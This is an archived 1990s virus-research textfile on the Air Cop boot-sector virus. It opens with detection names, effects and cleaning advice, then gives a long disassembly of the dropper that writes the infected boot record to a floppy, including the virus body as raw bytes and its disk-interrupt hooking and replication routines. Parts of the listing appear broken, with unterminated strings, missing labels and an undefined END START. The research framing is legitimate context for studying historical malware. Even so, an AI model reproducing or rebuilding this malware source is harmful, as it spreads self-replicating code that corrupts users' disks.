💾 Archived View for gemini.spam.works › mirrors › textfiles › virus › avcr-01.007 captured on 2020-10-31 at 01:16:21.

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       Distributed By Amateur Virus Creation & Research Group (AVCR)

                           Research of the Air Cop Virus
                                          Security Threat
Name of Virus:  Air Cop
Alias: Air Dropper
Type Of Code: Not Informed
VSUM Information - Resident boot
Antivirus Detection: 
ThunderByte Anti Virus (TBAV) reported aircop.com as dropper2 virus

Frisk Software's F-Protect (F-PROT) reported aircop.com as Air Dropper

McAfee Softwares Anti Virus (SCAN.EXE) reported aircop.com as Dropper virus

MicroSoft Anti Virus (MSAV.EXE) reported aircop.com as Dropper
Execution Results: It is a resident boot virus and it installs itself into
C:\ giving you an error saying "Non-system disk please replace and hit enter"
Cleaning Recommendations:  Cleaning is impossible but to rid your machine of 
the virus a boot off of a boot disk is needed and if drive C: can be acessed
it must be reformatted.
Researcher's Notes: Reads "STACK!" many times over and gives a warning line
then states that the virus is written by RABID development Corp.  
                      Disassembly of the AirCop Virus 
PAGE  59,132
;==                                                                      ==
;==                             AIRCOP                                   ==
;==                                                                      ==
;==      Created:   11-Jan-91                                            ==
;==      Version:                                                        ==
;==      Passes:    5          Analysis Options on: ABFMNOPU             ==
;==                                                                      ==
;==                                                                      ==
movseg           macro reg16, unused, Imm16     ; Fixup for Assembler
                 ifidn  <reg16>, <bx>
                 db     0BBh
                 ifidn  <reg16>, <cx>
                 db     0B9h
                 ifidn  <reg16>, <dx>
                 db     0BAh
                 ifidn  <reg16>, <si>
                 db     0BEh
                 ifidn  <reg16>, <di>
                 db     0BFh
                 ifidn  <reg16>, <bp>
                 db     0BDh
                 ifidn  <reg16>, <sp>
                 db     0BCh
                 ifidn  <reg16>, <BX>
                 db     0BBH
                 ifidn  <reg16>, <CX>
                 db     0B9H
                 ifidn  <reg16>, <DX>
                 db     0BAH
                 ifidn  <reg16>, <SI>
                 db     0BEH
                 ifidn  <reg16>, <DI>
                 db     0BFH
                 ifidn  <reg16>, <BP>
                 db     0BDH
                 ifidn  <reg16>, <SP>
                 db     0BCH
                 dw     seg Imm16
keybd_q_head    EQU     1AH                     ; (0040:001A=2CH)
keybd_q_tail    EQU     1CH                     ; (0040:001C=2CH)
                ASSUME  CS:SEG_A, DS:SEG_A
                ORG     100h
AIRCOP          PROC    FAR
                MOV     AX,CS
                MOV     DS,AX
                MOV     SP,3B6H
                MOV     AH,0
                MOV     AL,3
                INT     10H                     ; Video display   ah=functn 00h
                                                ;  set display mode in al
                MOV     DX,52BH
                MOV     AH,9
                INT     21H                     ; DOS Services  ah=function 09h
                                                ;  display char string at ds:dx
                MOV     DX,3C3H
                MOV     AH,9
                INT     21H                     ; DOS Services  ah=function 09h
                                                ;  display char string at ds:dx
                MOV     DX,4E5H
                MOV     AH,9
                INT     21H                     ; DOS Services  ah=function 09h
                                                ;  display char string at ds:dx
                MOV     DX,464H
                MOV     AH,9
                INT     21H                     ; DOS Services  ah=function 09h
                                                ;  display char string at ds:dx
                MOV     DX,480H
                MOV     AH,9
                INT     21H                     ; DOS Services  ah=function 09h
                                                ;  display char string at ds:dx
                MOV     AX,40H
                MOV     ES,AX
                PUSH    WORD PTR ES:keybd_q_tail        ; (0040:001C=2CH)
                POP     WORD PTR ES:keybd_q_head        ; (0040:001A=2CH)
                MOV     AX,CS
                MOV     ES,AX
                MOV     AH,8
                INT     21H                     ; DOS Services  ah=function 08h
                                                ;  get keybd char al, no echo
                MOV     CX,3
                PUSH    CX
                MOV     AX,201H
                MOV     BX,5D0H
                MOV     CX,1
                MOV     DX,0
                INT     13H                     ; Disk  dl=drive a  ah=func 02h
                                                ;  read sectors to memory es:bx
                POP     CX
                JNC     LOC_2                   ; Jump if carry=0
                LOOP    LOCLOOP_1               ; Loop if cx > 0
                MOV     DX,4F2H
                MOV     AH,9
                INT     21H                     ; DOS Services  ah=function 09h
                                                ;  display char string at ds:dx
                MOV     AX,4CFFH
                INT     21H                     ; DOS Services  ah=function 4Ch
                                                ;  terminate with al=return code
                MOV     CX,3
                PUSH    CX
                MOV     AX,301H
                MOV     BX,5D0H
                MOV     CX,2709H
                MOV     DX,100H
                INT     13H                     ; Disk  dl=drive a  ah=func 03h
                                                ;  write sectors from mem es:bx
                POP     CX
                JNC     LOC_4                   ; Jump if carry=0
                LOOP    LOCLOOP_3               ; Loop if cx > 0
                MOV     DX,50EH
                MOV     AH,9
                INT     21H                     ; DOS Services  ah=function 09h
                                                ;  display char string at ds:dx
                MOV     AX,4CFFH
                INT     21H                     ; DOS Services  ah=function 4Ch
                                                ;  terminate with al=return code
                MOV     CX,3
                PUSH    CX
                MOV     AX,301H
                MOV     BX,7D0H
                MOV     CX,1
                MOV     DX,0
                INT     13H                     ; Disk  dl=drive a  ah=func 03h
                                                ;  write sectors from mem es:bx
                POP     CX
;*              JNC     LOC_6                   ;*Jump if carry=0
                DB       73H, 0EH
                LOOP    LOCLOOP_5               ; Loop if cx > 0
                MOV     DX,57CH
                MOV     AH,9
DATA_1          DD      0FFB821CDH
DATA_2          DD      0BA21CD4CH
                DB      0E5H, 04H,0B4H, 09H,0CDH, 21H
                DB      0BAH, 9EH, 05H,0B4H, 09H,0CDH
                DB       21H,0B8H, 00H, 4CH,0CDH
                DB      21H
DATA_3          DB      'STACK   STACK   STACK   STACK   '
                DB      'STACK   STACK   STACK   STACK   '
                DB      'STACK   STACK   STACK   STACK   '
                DB      'STACK   STACK   STACK   STACK   '
                DB      'STACK   STACK   STACK   STACK   '
                DB      'STACK   STACK   STACK   STACK   '
                DB      'STACK   STACK   STACK   STACK   '
                DB      'STACK   STACK   STACK   STACK   '
                DB      'STACK   STACK   STACK   STACK   '
                DB      'STACK   STACK   STACK   STACK   '
                DB      'STACK   STACK   STACK   STACK   '
                DB      'STACK   STACK   STACK   STACK   '
                DB      'STACK   STACK   STACK   STACK   '
                DB      'STACK   STACK   STACK   STACK   '
                DB      'STACK   STACK   STACK   STACK   '
                DB      'STACK   STACK   STACK   STACK   '
                DB      0DH, 0AH, 'Attention: This virus '
                DB      'sample uses only in research tea'
                DB      'ms.', 0DH, 0AH, '           Plea'
                DB      'se do not use in joking or setti'
                DB      'ng trap on someone.', 0DH, 0AH, 0DH
                DB      0AH, 'Warning! This file installs'
                DB      ' "

                DB      '" into your 360K disk!', 0DH, 0AH
                DB      0DH, 0AH
                DB      7
DATA_6          DB      '

                DB      'Put a 360K (Blank Formatted) dis'
                DB      'k into drive A:', 0DH, 0AH, 'Str'
                DB      'ike any key to install, or CTRL-'
                DB      'BREAK to quit.', 0DH, 0AH, '

                DB      'Aircop Virus

                DB      'Cannot read boot record.', 0DH, 0AH
                DB       07H, 24H
DATA_10         DB      'Cannot write boot record.', 0DH, 0AH
                DB      7, '

DATA_11         DB      'AIRCOP Test Version: Property of'
                DB      ' The RABID Nat', 27H, 'nl Develo'
                DB      'pment Corp. ', 27H, '91', 0DH, 0AH
                DB      ' 

                DB      0DH, 0AH, 0DH, 0AH, 0DH, 0AH, 'Ca'
                DB      'nnot write virus boot record', 0DH
                DB      0AH
                DB      7
                DB      '

                DB      ' was installed into this 360K di'
                DB      'sk. BE CAREFUL!', 0DH, 0AH, '

                DB      512 DUP (0)
                DB      0EBH
                DB      '4', 90H, 'IBM  3.3'
                DB       00H, 02H, 02H, 01H, 00H, 02H
                DB       70H, 00H,0D0H, 02H,0FDH, 02H
                DB       00H, 09H, 00H, 02H, 00H
                DB      19 DUP (0)
                DB       12H, 00H, 00H, 00H, 00H, 01H
                DB       00H,0FAH, 33H,0C0H, 8EH,0D8H
                DB       8EH,0D0H,0BBH, 00H, 7CH, 8BH
                DB      0E3H, 1EH, 53H,0FFH, 0EH, 13H
                DB       04H,0CDH, 12H,0B1H, 06H,0D3H
                DB      0E0H, 8EH,0C0H, 87H, 06H, 4EH
                DB       00H,0A3H,0ABH, 7DH,0B8H, 28H
                DB       01H, 87H, 06H, 4CH, 00H,0A3H
                DB      0A9H, 7DH, 8CH,0C0H, 87H, 06H
                DB       66H, 00H,0A3H,0AFH, 7DH,0B8H
                DB      0BBH, 00H, 87H, 06H, 64H, 00H
                DB      0A3H,0ADH, 7DH, 33H,0FFH, 8BH
                DB      0F3H,0B9H, 00H, 01H,0FCH,0F3H
                DB      0A5H,0FBH, 06H,0B8H, 85H, 00H
                DB       50H,0CBH, 53H, 32H,0D2H,0E8H
                DB       70H, 00H, 5BH, 1EH, 07H,0B4H
                DB       02H,0B6H, 01H,0E8H, 8AH, 00H
                DB       72H, 10H, 0EH, 1FH,0BEH, 0BH
                DB       00H,0BFH, 0BH, 7CH,0B9H, 2BH
                DB       00H,0FCH,0F3H,0A6H, 74H, 07H
                POP     BX
                POP     AX
                PUSH    CS
                MOV     AX,0AFH
                PUSH    AX
                RETF                            ; Return far
                PUSH    CS
                POP     DS
                MOV     SI,1DBH
                CALL    SUB_1                   ; (08AA)
                XOR     AH,AH                   ; Zero register
                INT     16H                     ; Keyboard i/o  ah=function 00h
                                                ;  get keybd char in al, ah=scan
                XOR     AX,AX                   ; Zero register
                INT     13H                     ; Disk  dl=drive a  ah=func 00h
                                                ;  reset disk, al=return status
                PUSH    CS
                POP     ES
                MOV     BX,20DH
                MOV     CX,6
                XOR     DX,DX                   ; Zero register
                MOV     AX,201H
                INT     13H                     ; Disk  dl=drive a  ah=func 02h
                                                ;  read sectors to memory es:bx
                JC      LOC_9                   ; Jump if carry Set
                MOV     CX,0FF0H
                MOV     DS,CX
                JMP     CS:DATA_2               ; (97DC:01AD=0CD4CH)
AIRCOP          ENDP
;                              SUBROUTINE
SUB_1           PROC    NEAR
                MOV     BX,7
                CLD                             ; Clear direction
                LODSB                           ; String [si] to al
                OR      AL,AL                   ; Zero ?
                JZ      LOC_RET_14              ; Jump if zero
                JNS     LOC_11                  ; Jump if not sign
                XOR     AL,0D7H
                OR      BL,88H
                CMP     AL,20H                  ; ' '
                JBE     LOC_12                  ; Jump if below or =
                MOV     CX,1
                MOV     AH,9
                INT     10H                     ; Video display   ah=functn 09h
                                                ;  set char al & attrib bl @curs
                MOV     AH,0EH
                INT     10H                     ; Video display   ah=functn 0Eh
                                                ;  write char al, teletype mode
                JMP     SHORT LOC_10            ; (08AA)
;==== External Entry into Subroutine ======================================
                MOV     BX,200H
                MOV     CX,2
                MOV     AH,CL
                CALL    SUB_5                   ; (08ED)
                MOV     CX,2709H
                XOR     BYTE PTR ES:[BX],0FDH
                JZ      LOC_13                  ; Jump if zero
                MOV     CX,4F0FH
                JMP     SHORT LOC_RET_14        ; (08F7)
;==== External Entry into Subroutine ======================================
                MOV     AH,2
                MOV     BX,200H
;==== External Entry into Subroutine ======================================
                MOV     CX,1
;==== External Entry into Subroutine ======================================
                MOV     DH,0
;==== External Entry into Subroutine ======================================
                MOV     AL,1
;==== External Entry into Subroutine ======================================
                PUSHF                           ; Push flags
                CALL    CS:DATA_1               ; (97DC:01A9=21CDH)
SUB_1           ENDP
                PUSH    AX
                PUSH    BX
                PUSH    CX
                PUSH    DX
                PUSH    ES
                PUSH    DS
                PUSH    SI
                PUSH    DI
                PUSHF                           ; Push flags
                PUSH    CS
                POP     DS
                CMP     DL,1
                JA      LOC_16                  ; Jump if above
                AND     AX,0FE00H
                JZ      LOC_16                  ; Jump if zero
                XCHG    AL,CH
                SHL     AL,1                    ; Shift w/zeros fill
                ADD     AL,DH
                MOV     AH,9
                MUL     AH                      ; ax = reg * al
                ADD     AX,CX
                SUB     AL,6
                CMP     AX,6
                JA      LOC_16                  ; Jump if above
                PUSH    CS
                POP     ES
                CALL    SUB_3                   ; (08E5)
                JC      LOC_15                  ; Jump if carry Set
                MOV     DI,43H
                MOV     SI,250H
                MOV     CX,0EH
                STD                             ; Set direction flag
                REPE    CMPSB                   ; Rep zf=1+cx >0 Cmp [si] to es:[di]
                JZ      LOC_16                  ; Jump if zero
                SUB     SI,CX
                SUB     DI,CX
                MOV     CL,33H                  ; '3'
                REP     MOVSB                   ; Rep when cx >0 Mov [si] to es:[di]
                CALL    SUB_2                   ; (08CB)
                PUSH    CX
                PUSH    BX
                CALL    SUB_3                   ; (08E5)
                MOV     AH,3
                XOR     BX,BX                   ; Zero register
                CALL    SUB_4                   ; (08EA)
                POP     BX
                POP     CX
                JC      LOC_15                  ; Jump if carry Set
                MOV     DH,1
                MOV     AH,3
                CALL    SUB_6                   ; (08EF)
                XOR     AX,AX                   ; Zero register
                CALL    SUB_7                   ; (08F1)
                MOV     AH,4
                INT     1AH                     ; Real time clock   ah=func 04h
                                                ;  read date cx=year, dx=mon/day
                CMP     DH,9
                JNE     LOC_17                  ; Jump if not equal
                MOV     SI,1B1H
                CALL    SUB_1                   ; (08AA)
                POPF                            ; Pop flags
                POP     DI
                POP     SI
                POP     DS
                POP     ES
                POP     DX
                POP     CX
                POP     BX
                POP     AX
                JMP     CS:DATA_1               ; (97DC:01A9=21CDH)
                POP     CX
                IN      AL,DX                   ; port 100H
                ADD     AL,DH
                DB      0F2H,0E6H, 00H,0F0H,0DAH,0DDH
                DB       20H, 83H,0BFH,0BEH,0A4H,0F7H
                DB      0BEH,0A4H,0F7H, 96H,0BEH,0A5H
                DB      0B4H,0B8H,0A7H,0DAH,0DDH, 00H
                DB      'IO      SYSMSDOS   SYS', 0DH, 0AH
                DB      'Non-system disk or disk error', 0DH
                DB      0AH
                DB       00H, 00H, 55H,0AAH
SEG_A           ENDS
                END     START

        This virus was written for research purposes and RABID development
Corp. can in no way take responsibility for any damage done.